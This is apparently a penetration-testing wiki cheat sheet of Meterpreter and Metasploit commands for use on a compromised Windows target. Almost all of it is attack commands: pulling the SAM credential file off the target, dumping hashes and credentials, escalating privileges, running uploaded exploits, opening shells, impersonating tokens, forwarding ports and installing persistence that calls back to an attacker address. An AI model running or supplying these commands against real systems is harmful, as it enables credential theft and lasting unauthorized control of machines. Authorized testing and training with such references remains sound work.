Meterpreter

From pentestwiki.org

Useful commands:

Meterpreter upload file to Windows target:

meterpreter>upload file c:\\windows


Meterpreter download file from Windows target:

meterpreter>download c:\\windows\\repair\\sam /tmp


Meterpreter run an .exe on the target (handy for executing uploaded exploits):

meterpreter>execute -f c:\\windows\\temp\\exploit.exe


Creates a new channel with a cmd shell:

meterpreter>execute -f cmd -c


Meterpreter show processes:

meterpreter>ps


Meterpreter get shell on the target:

meterpreter>shell


Meterpreter attempts privilege escalation on the target:

meterpreter>getsystem


Meterpreter attempts to dump the hashes on the target:

meterpreter>hashdump


meterpreter>credcollect


Meterpreter create port forward to target machine:

meterpreter>portfwd add -l 3389 -p 3389 -r $IP


Meterpreter delete port forward:

meterpreter>portfwd delete -l 3389 -p 3389 -r $IP


Search for Excel files on the target machine:

meterpreter>search -f *.xlsx


Get user id:

meterpreter>getuid


Check whether the target architecture matches the Meterpreter architecture; if not, migrate to an x64 process:

meterpreter>sysinfo


Identify other machines that the supplied domain user has administrative access to:

meterpreter>run post/windows/gather/local_admin_search_enum


Netcat-like connect to a host and port:

msf>connect target port


Same, but over SSL:

msf>connect -s target port


Starts a Ruby shell:

msf>irb


Load plugins (e.g. pcap, wmap, nessus) and query the database:

msf>load wmap
msf>db_hosts
msf>db_vulns
msf>db_exploited


Meterpreter persistence mode:

meterpreter>run persistence -U -i 5 -p 443 -r $IP


Impersonate another user via token impersonation (incognito):

meterpreter>use incognito
meterpreter>list_tokens -u
meterpreter>impersonate_token MACHINE\\user
meterpreter>drop_token